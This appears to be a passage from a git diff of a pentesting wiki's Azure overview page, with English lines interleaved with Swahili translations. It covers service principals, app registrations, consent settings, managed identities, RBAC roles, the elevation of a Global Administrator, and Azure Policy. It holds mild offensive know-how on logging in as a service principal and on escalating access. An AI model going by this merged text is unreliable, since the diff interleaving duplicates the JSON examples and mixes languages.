- **Uanachama wa Kijamii**: Inasimamia kiotomatiki uanachama kwa kutumia sheria, ikisasisha ujumuishaji wa kundi wakati sifa za wanachama zinabadilika.
### **Service Principals**
### **Wakala wa Huduma**
A **Service Principal** is an **identity** created for **use** with **applications**, hosted services, and automated tools to access Azure resources. This access is **restricted by the roles assigned** to the service principal, giving you control over **which resources can be accessed** and at which level. For security reasons, it's always recommended to **use service principals with automated tools** rather than allowing them to log in with a user identity.
**Wakala wa Huduma** ni **utambulisho** ulioanzishwa kwa **matumizi** na **programu**, huduma zinazohudumiwa, na zana za kiotomatiki kufikia rasilimali za Azure. Ufikiaji huu ume **zuiwa na majukumu yaliyotolewa** kwa wakala wa huduma, na kukupa udhibiti juu ya **rasilimali zipi zinaweza kufikiwa** na kwa kiwango gani. Kwa sababu za usalama, kila wakati inapendekezwa **kutumia wakala wa huduma na zana za kiotomatiki** badala ya kuruhusu kuingia kwa utambulisho wa mtumiaji.
It's possible to **directly login as a service principal** by generating it a **secret** (password), a **certificate**, or granting **federated** access to third party platforms (e.g. Github Actions) over it.
Inawezekana **kuingia moja kwa moja kama wakala wa huduma** kwa kuunda **siri** (nenosiri), **cheti**, au kutoa **ufikiaji wa shirikisho** kwa majukwaa ya wahusika wengine (kwa mfano, Github Actions) juu yake.
- If you choose **password** auth (by default), **save the password generated** as you won't be able to access it again.
- If you choose certificate authentication, make sure the **application will have access over the private key**.
- Ikiwa unachagua uthibitishaji wa **nenosiri** (kwa kawaida), **hifadhi nenosiri lililotolewa** kwani huwezi kulifikia tena.
- Ikiwa unachagua uthibitishaji wa cheti, hakikisha **programu itakuwa na ufikiaji wa funguo za faragha**.
### App Registrations
### Usajili wa Programu
An **App Registration** is a configuration that allows an application to integrate with Entra ID and to perform actions.
Usajili wa **Programu** ni usanidi unaoruhusu programu kuungana na Entra ID na kufanya vitendo.
#### Key Components:
#### Vipengele Muhimu:
1. **Application ID (Client ID):** A unique identifier for your app in Azure AD.
2. **Redirect URIs:** URLs where Azure AD sends authentication responses.
3. **Certificates, Secrets & Federated Credentials:** It's possible to generate a secret or a certificate to login as the service principal of the application, or to grant federated access to it (e.g. Github Actions).&#x20;
1. If a **certificate** or **secret** is generated, it's possible to a person to **login as the service principal** with CLI tools by knowing the **application ID**, the **secret** or **certificate** and the **tenant** (domain or ID).
4. **API Permissions:** Specifies what resources or APIs the app can access.
5. **Authentication Settings:** Defines the app's supported authentication flows (e.g., OAuth2, OpenID Connect).
6. **Service Principal**: A service principal is created when an App is created (if it's done from the web console) or when it's installed in a new tenant.
1. The **service principal** will get all the requested permissions it was configured with.
1. **Kitambulisho cha Programu (Kitambulisho cha Mteja):** Kitambulisho cha kipekee kwa programu yako katika Azure AD.
2. **URIs za Kurudisha:** URL ambapo Azure AD inatuma majibu ya uthibitishaji.
3. **Cheti, Siri & Ruhusa za Shirikisho:** Inawezekana kuunda siri au cheti kuingia kama wakala wa huduma wa programu, au kutoa ufikiaji wa shirikisho kwake (kwa mfano, Github Actions).&#x20;
1. Ikiwa **cheti** au **siri** imeundwa, mtu anaweza **kuingia kama wakala wa huduma** kwa kutumia zana za CLI kwa kujua **kitambulisho cha programu**, **siri** au **cheti** na **tenant** (kikoa au ID).
4. **Ruhusa za API:** Inabainisha rasilimali au API zipi programu inaweza kufikia.
5. **Mipangilio ya Uthibitishaji:** Inafafanua mchakato wa uthibitishaji unaounga mkono programu (kwa mfano, OAuth2, OpenID Connect).
6. **Wakala wa Huduma**: Wakala wa huduma huundwa wakati programu inaundwa (ikiwa inafanywa kutoka kwenye konsole ya wavuti) au wakati inasakinishwa katika tenant mpya.
1. **Wakala wa huduma** utapata ruhusa zote zilizohitajika alizopangwa nazo.
### Default Consent Permissions
### Ruhusa za Kawaida za Kukubali
**User consent for applications**
**Ruhusa za mtumiaji kwa programu**
- **Do not allow user consent**
- An administrator will be required for all apps.
- **Allow user consent for apps from verified publishers, for selected permissions (Recommended)**
- All users can consent for permissions classified as "low impact", for apps from verified publishers or apps registered in this organization.
- **Default** low impact permissions (although you need to accept to add them as low):
- User.Read - sign in and read user profile
- offline_access - maintain access to data that users have given it access to
- openid - sign users in
- profile - view user's basic profile
- email - view user's email address
- **Allow user consent for apps (Default)**
- All users can consent for any app to access the organization's data.
- **Usiruhusu ruhusa za mtumiaji**
- Msimamizi atahitajika kwa programu zote.
- **Ruhusu ruhusa za mtumiaji kwa programu kutoka kwa wachapishaji waliothibitishwa, kwa ruhusa zilizochaguliwa (Inapendekezwa)**
- Watumiaji wote wanaweza kukubali ruhusa zilizopangwa kama "athari ndogo", kwa programu kutoka kwa wachapishaji waliothibitishwa au programu zilizoorodheshwa katika shirika hili.
- **Kawaida** ruhusa za athari ndogo (ingawa unahitaji kukubali kuziongeza kama ndogo):
- User.Read - ingia na kusoma wasifu wa mtumiaji
- offline_access - kudumisha ufikiaji wa data ambayo watumiaji wameipa ufikiaji
- openid - ingiza watumiaji
- profile - ona wasifu wa msingi wa mtumiaji
- email - ona anwani ya barua pepe ya mtumiaji
- **Ruhusu ruhusa za mtumiaji kwa programu (Kawaida)**
- Watumiaji wote wanaweza kukubali kwa programu yoyote kufikia data za shirika.
**Admin consent requests**: Default **No**
**Maombi ya ruhusa za msimamizi**: Kawaida **Hapana**
- Users can request admin consent to apps they are unable to consent to
- If **Yes**: Its possible to indicate Users, Groups and Roles that can consent requests
- Configure also if users will receive email notifications and expiration reminders&#x20;
- Watumiaji wanaweza kuomba ruhusa za msimamizi kwa programu ambazo hawawezi kukubali
- Ikiwa **Ndio**: Inawezekana kuonyesha Watumiaji, Vikundi na Majukumu ambayo yanaweza kukubali maombi
- Sanidi pia ikiwa watumiaji watapokea arifa za barua pepe na ukumbusho wa muda wa mwisho&#x20;
### **Managed Identity (Metadata)**
### **Utambulisho wa Kusimamiwa (Metadata)**
Managed identities in Azure Active Directory offer a solution for **automatically managing the identity** of applications. These identities are used by applications for the purpose of **connecting** to **resources** compatible with Azure Active Directory (**Azure AD**) authentication. This allows to **remove the need of hardcoding cloud credentials** in the code as the application will be able to contact the **metadata** service to get a valid token to **perform actions** as the indicated managed identity in Azure.
Utambulisho wa kusimamiwa katika Azure Active Directory unatoa suluhisho la **kusimamia kiotomatiki utambulisho** wa programu. Utambulisho huu unatumika na programu kwa lengo la **kuunganisha** na **rasilimali** zinazofaa na uthibitishaji wa Azure Active Directory (**Azure AD**). Hii inaruhusu **kuondoa hitaji la kuweka akiba ya akidi za wingu** katika msimbo kwani programu itakuwa na uwezo wa kuwasiliana na huduma ya **metadata** ili kupata token halali ya **kufanya vitendo** kama utambulisho wa kusimamiwa ulioonyeshwa katika Azure.
There are two types of managed identities:
Kuna aina mbili za utambulisho wa kusimamiwa:
- **System-assigned**. Some Azure services allow you to **enable a managed identity directly on a service instance**. When you enable a system-assigned managed identity, a **service principal** is created in the Entra ID tenant trusted by the subscription where the resource is located. When the **resource** is **deleted**, Azure automatically **deletes** the **identity** for you.
- **User-assigned**. It's also possible for users to generate managed identities. These are created inside a resource group inside a subscription and a service principal will be created in the EntraID trusted by the subscription. Then, you can assign the managed identity to one or **more instances** of an Azure service (multiple resources). For user-assigned managed identities, the **identity is managed separately from the resources that use it**.
- **Iliyotolewa na mfumo**. Huduma zingine za Azure zinakuruhusu **kuwezesha utambulisho wa kusimamiwa moja kwa moja kwenye mfano wa huduma**. Unapowezesha utambulisho wa kusimamiwa wa mfumo, **wakala wa huduma** huundwa katika tenant ya Entra ID inayotegemewa na usajili ambapo rasilimali iko. Wakati **rasilimali** inafutwa, Azure kiotomatiki **inafuta** **utambulisho** kwa ajili yako.
- **Iliyotolewa na mtumiaji**. Pia inawezekana kwa watumiaji kuunda utambulisho wa kusimamiwa. Hizi huundwa ndani ya kundi la rasilimali ndani ya usajili na wakala wa huduma utaanzishwa katika EntraID inayotegemewa na usajili. Kisha, unaweza kupeana utambulisho wa kusimamiwa kwa mfano mmoja au **zaidi** ya huduma ya Azure (rasilimali nyingi). Kwa utambulisho wa kusimamiwa wa mtumiaji, **utambulisho unasimamiwa tofauti na rasilimali zinazoutumia**.
Managed Identities **don't generate eternal credentials** (like passwords or certificates) to access as the service principal attached to it.
Utambulisho wa Kusimamiwa **hauzali akidi za kudumu** (kama nenosiri au vyeti) kufikia kama wakala wa huduma ulioambatanishwa nayo.
### Enterprise Applications
### Programu za Kijamii
Its just a **table in Azure to filter service principals** and check the applications that have been assigned to.
Ni tu **meza katika Azure kuchuja wakala wa huduma** na kuangalia programu ambazo zimepewa.
**It isnt another type of “application”,** there isnt any object in Azure that is an “Enterprise Application”, its just an abstraction to check the Service principals, App registrations and managed identities.
**Sio aina nyingine ya "programu",** hakuna kitu chochote katika Azure ambacho ni "Programu ya Kijamii", ni tu muundo wa kuangalia Wakala wa huduma, Usajili wa programu na utambulisho wa kusimamiwa.
### Administrative Units
### Vitengo vya Utawala
Administrative units allows to **give permissions from a role over a specific portion of an organization**.
Vitengo vya utawala vinaruhusu **kutoa ruhusa kutoka kwa jukumu juu ya sehemu maalum ya shirika**.
Example:
Mfano:
- Scenario: A company wants regional IT admins to manage only the users in their own region.
- Implementation:
- Create Administrative Units for each region (e.g., "North America AU", "Europe AU").
- Populate AUs with users from their respective regions.
- AUs can **contain users, groups, or devices**
- AUs support **dynamic memberships**
- AUs **cannot contain AUs**
- Assign Admin Roles:
- Grant the "User Administrator" role to regional IT staff, scoped to their region's AU.
- Outcome: Regional IT admins can manage user accounts within their region without affecting other regions.
- Hali: Kampuni inataka wasimamizi wa IT wa kikanda wasimamie tu watumiaji katika eneo lao.
- Utekelezaji:
- Unda Vitengo vya Utawala kwa kila eneo (kwa mfano, "Kaskazini mwa Amerika AU", "Ulaya AU").
- Jaza AUs na watumiaji kutoka maeneo yao.
- AUs zinaweza **kuhifadhi watumiaji, vikundi, au vifaa**
- AUs zinasaidia **uanachama wa kijamii**
- AUs **haziwezi kuwa na AUs**
- Peana Majukumu ya Usimamizi:
- Peana jukumu la "Msimamizi wa Watumiaji" kwa wafanyakazi wa IT wa kikanda, lililowekwa kwenye AU ya eneo lao.
- Matokeo: Wasimamizi wa IT wa kikanda wanaweza kusimamia akaunti za watumiaji ndani ya eneo lao bila kuathiri maeneo mengine.
### Entra ID Roles
### Majukumu ya Entra ID
- In order to manage Entra ID there are some **built-in roles** that can be assigned to Entra ID principals to manage Entra ID
- Check the roles in [https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/permissions-reference](https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/permissions-reference)
- The most privileged role is **Global Administrator**
- In the Description of the role its possible to see its **granular permissions**
- Ili kusimamia Entra ID kuna **majukumu yaliyojengwa ndani** ambayo yanaweza kutolewa kwa wakala wa Entra ID kusimamia Entra ID
- Angalia majukumu katika [https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/permissions-reference](https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/permissions-reference)
- Jukumu lenye mamlaka zaidi ni **Msimamizi wa Kimataifa**
- Katika Maelezo ya jukumu inawezekana kuona **ruhusa zake za kina**
## Roles & Permissions
## Majukumu & Ruhusa
**Roles** are **assigned** to **principals** on a **scope**: `principal -[HAS ROLE]->(scope)`
**Majukumu** yanatolewa kwa **wakala** kwenye **kasi**: `wakala -[ANA JUKUMU]->(kasi)`
**Roles** assigned to **groups** are **inherited** by all the **members** of the group.
**Majukumu** yaliyotolewa kwa **vikundi** yanarithiwa na **wanachama** wote wa kundi.
Depending on the scope the role was assigned to, the **role** cold be **inherited** to **other resources** inside the scope container. For example, if a user A has a **role on the subscription**, he will have that **role on all the resource groups** inside the subscription and on **all the resources** inside the resource group.
Kulingana na kasi ambayo jukumu lilitolewa, **jukumu** linaweza **kurithiwa** kwa **rasilimali nyingine** ndani ya kontena la kasi. Kwa mfano, ikiwa mtumiaji A ana **jukumu kwenye usajili**, atakuwa na **jukumu hilo kwenye vikundi vyote vya rasilimali** ndani ya usajili na kwenye **rasilimali zote** ndani ya kundi la rasilimali.
### **Classic Roles**
### **Majukumu ya K klasiki**
| **Owner** | <ul><li>Full access to all resources</li><li>Can manage access for other users</li></ul> | All resource types |
| **Mmiliki** | <ul><li>Ufikiaji kamili kwa rasilimali zote</li><li>Anaweza kusimamia ufikiaji kwa watumiaji wengine</li></ul> | Aina zote za rasilimali |
| ----------------------------- | ---------------------------------------------------------------------------------------- | ------------------ |
| **Contributor** | <ul><li>Full access to all resources</li><li>Cannot manage access</li></ul> | All resource types |
| **Reader** | • View all resources | All resource types |
| **User Access Administrator** | <ul><li>View all resources</li><li>Can manage access for other users</li></ul> | All resource types |
| **Mchangiaji** | <ul><li>Ufikiaji kamili kwa rasilimali zote</li><li>Haiwezi kusimamia ufikiaji</li></ul> | Aina zote za rasilimali |
| **Msomaji** | • Ona rasilimali zote | Aina zote za rasilimali |
| **Msimamizi wa Ufikiaji wa Mtumiaji** | <ul><li>Ona rasilimali zote</li><li>Anaweza kusimamia ufikiaji kwa watumiaji wengine</li></ul> | Aina zote za rasilimali |
### Built-In roles
### Majukumu Yaliyojengwa Ndani
[From the docs: ](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles)[Azure role-based access control (Azure RBAC)](https://learn.microsoft.com/en-us/azure/role-based-access-control/overview) has several Azure **built-in roles** that you can **assign** to **users, groups, service principals, and managed identities**. Role assignments are the way you control **access to Azure resources**. If the built-in roles don't meet the specific needs of your organization, you can create your own [**Azure custom roles**](https://learn.microsoft.com/en-us/azure/role-based-access-control/custom-roles)**.**
[Kutoka kwenye hati: ](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles)[Udhibiti wa ufikiaji wa Azure (Azure RBAC)](https://learn.microsoft.com/en-us/azure/role-based-access-control/overview) ina majukumu kadhaa ya Azure **yaliyojengwa ndani** ambayo unaweza **kutoa** kwa **watumiaji, vikundi, wakala wa huduma, na utambulisho wa kusimamiwa**. Utoaji wa majukumu ndiyo njia unayodhibiti **ufikiaji wa rasilimali za Azure**. Ikiwa majukumu yaliyojengwa ndani hayakidhi mahitaji maalum ya shirika lako, unaweza kuunda [**majukumu ya kawaida ya Azure**](https://learn.microsoft.com/en-us/azure/role-based-access-control/custom-roles)**.**
**Built-In** roles apply only to the **resources** they are **meant** to, for example check this 2 examples of **Built-In roles over Compute** resources:
**Majukumu Yaliyojengwa Ndani** yanatumika tu kwa **rasilimali** ambazo zime **kusudiwa**, kwa mfano angalia mifano hii 2 ya **Majukumu Yaliyojengwa Ndani** juu ya rasilimali za **Kumbukumbu**:
| [Disk Backup Reader](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles#disk-backup-reader) | Provides permission to backup vault to perform disk backup. | 3e5e47e6-65f7-47ef-90b5-e5dd4d455f24 |
| [Msomaji wa Nakala ya Disk](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles#disk-backup-reader) | Inatoa ruhusa kwa vault ya nakala kufanya nakala ya disk. | 3e5e47e6-65f7-47ef-90b5-e5dd4d455f24 |
| ----------------------------------------------------------------------------------------------------------------------------------------- | ---------------------------------------------------------------- | ------------------------------------ |
| [Virtual Machine User Login](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles#virtual-machine-user-login) | View Virtual Machines in the portal and login as a regular user. | fb879df8-f326-4884-b1cf-06f3ad86be52 |
| [Kuingia kwa Mtumiaji wa Mashine ya Virtual](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles#virtual-machine-user-login) | Ona Mashine za Virtual kwenye lango na kuingia kama mtumiaji wa kawaida. | fb879df8-f326-4884-b1cf-06f3ad86be52 |
This roles can **also be assigned over logic containers** (such as management groups, subscriptions and resource groups) and the principals affected will have them **over the resources inside those containers**.
Majukumu haya yanaweza **pia kutolewa juu ya kontena za mantiki** (kama vile vikundi vya usimamizi, usajili na vikundi vya rasilimali) na wakala walioathiriwa watakuwa nao **juu ya rasilimali ndani ya kontena hizo**.
- Find here a list with [**all the Azure built-in roles**](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles).
- Find here a list with [**all the Entra ID built-in roles**](https://learn.microsoft.com/en-us/azure/active-directory/roles/permissions-reference).
- Pata hapa orodha ya [**majukumu yote ya Azure yaliyojengwa ndani**](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles).
- Pata hapa orodha ya [**majukumu yote ya Entra ID yaliyojengwa ndani**](https://learn.microsoft.com/en-us/azure/active-directory/roles/permissions-reference).
### Custom Roles
### Majukumu ya Kawaida
- Its also possible to create [**custom roles**](https://learn.microsoft.com/en-us/azure/role-based-access-control/custom-roles)
- They are created inside a scope, although a role can be in several scopes (management groups, subscription and resource groups)
- Its possible to configure all the granular permissions the custom role will have
- Its possible to exclude permissions
- A principal with a excluded permission wont be able to use it even if the permissions is being granted elsewhere
- Its possible to use wildcards
- The used format is a JSON
- `actions` are for control actions over the resource
- `dataActions` are permissions over the data within the object
Example of permissions JSON for a custom role:
- Pia inawezekana kuunda [**majukumu ya kawaida**](https://learn.microsoft.com/en-us/azure/role-based-access-control/custom-roles)
- Yanaanzishwa ndani ya kasi, ingawa jukumu linaweza kuwa katika kasi kadhaa (vikundi vya usimamizi, usajili na vikundi vya rasilimali)
- Inawezekana kusanidi ruhusa zote za kina ambazo jukumu la kawaida litakuwa nazo
- Inawezekana kuondoa ruhusa
- Wakala mwenye ruhusa iliyondolewa hataweza kuitumia hata kama ruhusa hiyo inatolewa mahali pengine
- Inawezekana kutumia wildcards
- Muundo unaotumika ni JSON
- `actions` ni kwa ajili ya kudhibiti vitendo juu ya rasilimali
- `dataActions` ni ruhusa juu ya data ndani ya kitu
Mfano wa ruhusa JSON kwa jukumu la kawaida:
```json
{
"properties": {
"roleName": "",
"description": "",
"assignableScopes": ["/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f"],
"permissions": [
{
"actions": [
"Microsoft.DigitalTwins/register/action",
"Microsoft.DigitalTwins/unregister/action",
"Microsoft.DigitalTwins/operations/read",
"Microsoft.DigitalTwins/digitalTwinsInstances/read",
"Microsoft.DigitalTwins/digitalTwinsInstances/write",
"Microsoft.CostManagement/exports/*"
],
"notActions": [
"Astronomer.Astro/register/action",
"Astronomer.Astro/unregister/action",
"Astronomer.Astro/operations/read",
"Astronomer.Astro/organizations/read"
],
"dataActions": [],
"notDataActions": []
}
]
}
"properties": {
"roleName": "",
"description": "",
"assignableScopes": ["/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f"],
"permissions": [
{
"actions": [
"Microsoft.DigitalTwins/register/action",
"Microsoft.DigitalTwins/unregister/action",
"Microsoft.DigitalTwins/operations/read",
"Microsoft.DigitalTwins/digitalTwinsInstances/read",
"Microsoft.DigitalTwins/digitalTwinsInstances/write",
"Microsoft.CostManagement/exports/*"
],
"notActions": [
"Astronomer.Astro/register/action",
"Astronomer.Astro/unregister/action",
"Astronomer.Astro/operations/read",
"Astronomer.Astro/organizations/read"
],
"dataActions": [],
"notDataActions": []
}
]
}
}
```
### Permissions order
- In order for a **principal to have some access over a resource** he needs an explicit role being granted to him (anyhow) **granting him that permission**.
- An explicit **deny role assignment takes precedence** over the role granting the permission.
- Ili **principal awe na ufikiaji wa rasilimali** anahitaji jukumu lililo wazi kumwagiwa (kwa namna yoyote) **linalompa ruhusa hiyo**.
- Jukumu lililo wazi la **kukataa linachukua kipaumbele** juu ya jukumu linalotoa ruhusa.
<figure><img src="../../../images/image (191).png" alt=""><figcaption><p><a href="https://link.springer.com/chapter/10.1007/978-1-4842-7325-8_10">https://link.springer.com/chapter/10.1007/978-1-4842-7325-8_10</a></p></figcaption></figure>
### Global Administrator
Global Administrator is a role from Entra ID that grants **complete control over the Entra ID tenant**. However, it doesn't grant any permissions over Azure resources by default.
Global Administrator ni jukumu kutoka Entra ID linalotoa **udhibiti kamili juu ya mpangilio wa Entra ID**. Hata hivyo, halitoi ruhusa yoyote juu ya rasilimali za Azure kwa msingi.
Users with the Global Administrator role has the ability to '**elevate' to User Access Administrator Azure role in the Root Management Group**. So Global Administrators can manage access in **all Azure subscriptions and management groups.**\
This elevation can be done at the end of the page: [https://portal.azure.com/#view/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/\~/Properties](https://portal.azure.com/#view/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/~/Properties)
Watumiaji wenye jukumu la Global Administrator wana uwezo wa '**kuinua' hadi Jukumu la Msimamizi wa Ufikiaji wa Mtumiaji wa Azure katika Kundi la Usimamizi wa Mizizi**. Hivyo, Wasimamizi wa Global wanaweza kusimamia ufikiaji katika **mikataba yote ya Azure na makundi ya usimamizi.**\
Kuinua hii inaweza kufanywa mwishoni mwa ukurasa: [https://portal.azure.com/#view/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/\~/Properties](https://portal.azure.com/#view/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/~/Properties)
<figure><img src="../../../images/image (349).png" alt=""><figcaption></figcaption></figure>
### Azure Policies
**Azure Policies** are rules that help organizations ensure their resources meet specific standards and compliance requirements. They allow you to **enforce or audit settings on resources in Azure**. For example, you can prevent the creation of virtual machines in an unauthorized region or ensure that all resources have specific tags for tracking.
**Azure Policies** ni sheria zinazosaidia mashirika kuhakikisha rasilimali zao zinakidhi viwango maalum na mahitaji ya ufuatiliaji. Zinakuwezesha **kulazimisha au kukagua mipangilio kwenye rasilimali za Azure**. Kwa mfano, unaweza kuzuia uundaji wa mashine za virtual katika eneo lisiloidhinishwa au kuhakikisha kwamba rasilimali zote zina lebo maalum za kufuatilia.
Azure Policies are **proactive**: they can stop non-compliant resources from being created or changed. They are also **reactive**, allowing you to find and fix existing non-compliant resources.
Azure Policies ni **za awali**: zinaweza kuzuia rasilimali zisizokidhi viwango zisizoundwa au kubadilishwa. Pia ni **za majibu**, zikikuruhusu kupata na kurekebisha rasilimali zisizokidhi viwango zilizopo.
#### **Key Concepts**
1. **Policy Definition**: A rule, written in JSON, that specifies what is allowed or required.
2. **Policy Assignment**: The application of a policy to a specific scope (e.g., subscription, resource group).
3. **Initiatives**: A collection of policies grouped together for broader enforcement.
4. **Effect**: Specifies what happens when the policy is triggered (e.g., "Deny," "Audit," or "Append").
1. **Policy Definition**: Sheria, iliyoandikwa kwa JSON, inayobainisha kile kinachoruhusiwa au kinachohitajika.
2. **Policy Assignment**: Matumizi ya sera kwa kiwango maalum (mfano, usajili, kundi la rasilimali).
3. **Initiatives**: Mkusanyiko wa sera zilizopangwa pamoja kwa ajili ya utekelezaji mpana.
4. **Effect**: Inabainisha kinachotokea wakati sera inapoanzishwa (mfano, "Deny," "Audit," au "Append").
**Some examples:**
**Mifano kadhaa:**
1. **Ensuring Compliance with Specific Azure Regions**: This policy ensures that all resources are deployed in specific Azure regions. For example, a company might want to ensure all its data is stored in Europe for GDPR compliance.
2. **Enforcing Naming Standards**: Policies can enforce naming conventions for Azure resources. This helps in organizing and easily identifying resources based on their names, which is helpful in large environments.
3. **Restricting Certain Resource Types**: This policy can restrict the creation of certain types of resources. For example, a policy could be set to prevent the creation of expensive resource types, like certain VM sizes, to control costs.
4. **Enforcing Tagging Policies**: Tags are key-value pairs associated with Azure resources used for resource management. Policies can enforce that certain tags must be present, or have specific values, for all resources. This is useful for cost tracking, ownership, or categorization of resources.
5. **Limiting Public Access to Resources**: Policies can enforce that certain resources, like storage accounts or databases, do not have public endpoints, ensuring that they are only accessible within the organization's network.
6. **Automatically Applying Security Settings**: Policies can be used to automatically apply security settings to resources, such as applying a specific network security group to all VMs or ensuring that all storage accounts use encryption.
1. **Kuhakikisha Ufuatiliaji na Mikoa Maalum ya Azure**: Sera hii inahakikisha kwamba rasilimali zote zinapelekwa katika mikoa maalum ya Azure. Kwa mfano, kampuni inaweza kutaka kuhakikisha kwamba data yake yote inahifadhiwa barani Ulaya kwa ajili ya ufuatiliaji wa GDPR.
2. **Kulazimisha Viwango vya Ujumuishaji**: Sera zinaweza kulazimisha kanuni za majina kwa rasilimali za Azure. Hii inasaidia katika kuandaa na kutambua kwa urahisi rasilimali kulingana na majina yao, ambayo ni muhimu katika mazingira makubwa.
3. **Kuzuia Aina Fulani za Rasilimali**: Sera hii inaweza kuzuia uundaji wa aina fulani za rasilimali. Kwa mfano, sera inaweza kuwekwa kuzuia uundaji wa aina za rasilimali zenye gharama kubwa, kama vile ukubwa fulani wa VM, ili kudhibiti gharama.
4. **Kulazimisha Sera za Uwekaji Lebo**: Lebo ni jozi za funguo-thamani zinazohusishwa na rasilimali za Azure zinazotumika kwa usimamizi wa rasilimali. Sera zinaweza kulazimisha kwamba lebo fulani lazima ziwepo, au ziwe na thamani maalum, kwa rasilimali zote. Hii ni muhimu kwa ufuatiliaji wa gharama, umiliki, au upangaji wa rasilimali.
5. **Kuzuia Ufikiaji wa Umma kwa Rasilimali**: Sera zinaweza kulazimisha kwamba rasilimali fulani, kama akaunti za hifadhi au hifadhidata, hazina maeneo ya umma, kuhakikisha kwamba zinapatikana tu ndani ya mtandao wa shirika.
6. **Kuweka Mipangilio ya Usalama Kiotomatiki**: Sera zinaweza kutumika kuweka mipangilio ya usalama kiotomatiki kwa rasilimali, kama vile kuweka kundi maalum la usalama wa mtandao kwa VMs zote au kuhakikisha kwamba akaunti zote za hifadhi zinatumia usimbaji.
Note that Azure Policies can be attached to any level of the Azure hierarchy, but they are **commonly used in the root management group** or in other management groups.
Kumbuka kwamba Azure Policies zinaweza kuunganishwa kwenye ngazi yoyote ya hiyerarhii ya Azure, lakini mara nyingi hutumiwa katika kundi la usimamizi wa mizizi **au katika makundi mengine ya usimamizi**.
Azure policy json example:
```json
{
"policyRule": {
"if": {
"field": "location",
"notIn": ["eastus", "westus"]
},
"then": {
"effect": "Deny"
}
},
"parameters": {},
"displayName": "Allow resources only in East US and West US",
"description": "This policy ensures that resources can only be created in East US or West US.",
"mode": "All"
"policyRule": {
"if": {
"field": "location",
"notIn": ["eastus", "westus"]
},
"then": {
"effect": "Deny"
}
},
"parameters": {},
"displayName": "Allow resources only in East US and West US",
"description": "This policy ensures that resources can only be created in East US or West US.",
"mode": "All"
}
```
### Permissions Inheritance
In Azure **permissions are can be assigned to any part of the hierarchy**. That includes management groups, subscriptions, resource groups, and individual resources. Permissions are **inherited** by contained **resources** of the entity where they were assigned.
Katika Azure **permissions zinaweza kupewa sehemu yoyote ya hiyerarhii**. Hii inajumuisha makundi ya usimamizi, usajili, vikundi vya rasilimali, na rasilimali binafsi. Permissions **zinapewa** na **rasilimali** zilizomo katika chombo ambacho zilipewa.
This hierarchical structure allows for efficient and scalable management of access permissions.
Muundo huu wa hiyerarhii unaruhusu usimamizi mzuri na wa kupanuka wa ruhusa za ufikiaji.
<figure><img src="../../../images/image (26).png" alt=""><figcaption></figcaption></figure>
### Azure RBAC vs ABAC
**RBAC** (role-based access control) is what we have seen already in the previous sections: **Assigning a role to a principal to grant him access** over a resource.\
However, in some cases you might want to provide **more fined-grained access management** or **simplify** the management of **hundreds** of role **assignments**.
**RBAC** (udhibiti wa ufikiaji kulingana na jukumu) ni kile tulichokiona tayari katika sehemu zilizopita: **Kutoa jukumu kwa msingi ili kumpa ufikiaji** juu ya rasilimali.\
Hata hivyo, katika baadhi ya matukio unaweza kutaka kutoa **usimamizi wa ufikiaji wa kiwango cha juu zaidi** au **kurahisisha** usimamizi wa **mamia** ya **mipangilio** ya jukumu.
Azure **ABAC** (attribute-based access control) builds on Azure RBAC by adding **role assignment conditions based on attributes** in the context of specific actions. A _role assignment condition_ is an **additional check that you can optionally add to your role assignment** to provide more fine-grained access control. A condition filters down permissions granted as a part of the role definition and role assignment. For example, you can **add a condition that requires an object to have a specific tag to read the object**.\
You **cannot** explicitly **deny** **access** to specific resources **using conditions**.
Azure **ABAC** (udhibiti wa ufikiaji kulingana na sifa) inajengwa juu ya Azure RBAC kwa kuongeza **masharti ya mipangilio ya jukumu kulingana na sifa** katika muktadha wa vitendo maalum. _Sharti la mipangilio ya jukumu_ ni **ukaguzi wa ziada ambao unaweza kuongeza kwa hiari kwenye mipangilio yako ya jukumu** ili kutoa udhibiti wa ufikiaji wa kiwango cha juu zaidi. Sharti linachuja ruhusa zinazotolewa kama sehemu ya ufafanuzi wa jukumu na mipangilio ya jukumu. Kwa mfano, unaweza **kuongeza sharti linalohitaji kitu kuwa na lebo maalum ili kusoma kitu**.\
Huwezi **kukatisha** **ufikiaji** kwa rasilimali maalum **ukitumia masharti**.
## References
@@ -379,7 +375,3 @@ You **cannot** explicitly **deny** **access** to specific resources **using cond
- [https://stackoverflow.com/questions/65922566/what-are-the-differences-between-service-principal-and-app-registration](https://stackoverflow.com/questions/65922566/what-are-the-differences-between-service-principal-and-app-registration)
{{#include ../../../banners/hacktricks-training.md}}

188
src/pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.md
View File

@@ -4,98 +4,97 @@
## Basic Information
Entra ID is Microsoft's cloud-based identity and access management (IAM) platform, serving as the foundational authentication and authorization system for services like Microsoft 365 and Azure Resource Manager. Azure AD implements the OAuth 2.0 authorization framework and the OpenID Connect (OIDC) authentication protocol to manage access to resources.
Entra ID ni jukwaa la usimamizi wa utambulisho na ufikiaji (IAM) la Microsoft linalotegemea wingu, likihudumia kama mfumo wa msingi wa uthibitishaji naidhinisha huduma kama Microsoft 365 na Azure Resource Manager. Azure AD inatekeleza mfumo wa idhini wa OAuth 2.0 na itifaki ya uthibitishaji ya OpenID Connect (OIDC) ili kusimamia ufikiaji wa rasilimali.
### OAuth
**Key Participants in OAuth 2.0:**
**Washiriki Wakuu katika OAuth 2.0:**
1. **Resource Server (RS):** Protects resources owned by the resource owner.
2. **Resource Owner (RO):** Typically an end-user who owns the protected resources.
3. **Client Application (CA):** An application seeking access to resources on behalf of the resource owner.
